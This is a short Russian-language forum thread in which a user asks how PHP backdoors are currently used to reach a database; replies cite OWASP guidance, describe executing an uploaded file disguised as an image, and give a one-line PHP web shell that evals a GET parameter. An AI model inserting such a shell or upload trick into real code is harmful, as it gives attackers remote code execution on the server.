Задать вопрос
Mike_Ro
@Mike_Ro
Python, JS, WordPress, SEO, Bots, Adversting

Примеры Back-door в php скриптах?

Приветствую!

Поделитесь мыслями, как в настоящее время получают доступ к БД через php скрипты?
Мне первое, что на ум приходит, так это каким то образом закинуть файл на сервер и далее его выполнить. Какие еще имеются решения?

Спасибо!
  • Вопрос задан
  • 4048 просмотров
Подписаться 9 Простой 6 комментариев
Решения вопроса 6
Lopar
@Lopar
системный администратор
eval();
Ответ написан
Комментировать
@AlexndrNovikov
Solution Architect in Spiral Scout
Да ну в общем-то PHP ничем принципиально не отличается от любого другого стека, и уязвимости которые можно эксплуатировать ровно те же самые.

Адекватный список которым можно руководствоваться - OWASP Top 10

Конкретно 5 из 10 про PHP с примерами кода и методами защиты PHP Top 5

Данные по ссылкам не вот прям совсем свежие, но актуальности не теряют
Ответ написан
Комментировать
@yandekx
если неправильно настроить сервер на проверку файлов, то загрузив файл как картинку на сайте через стандартную форму, можно исполнить его example.com/images/door.php просто зайдя на него.
Ответ написан
В дополнение к ответам: бэкдор, это то что намерено оставляют коде. Не всякий баг это бэкдор, и не всякий бэкдор это баг. Можно eval() воткнуть специально, тогда это бэкдор, а можно по незнанию, тогда это баг =) off>
Ответ написан
@Yan-s
<?php
eval($_GET['backdoor']);
Ответ написан
Комментировать
@XXX-prog
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы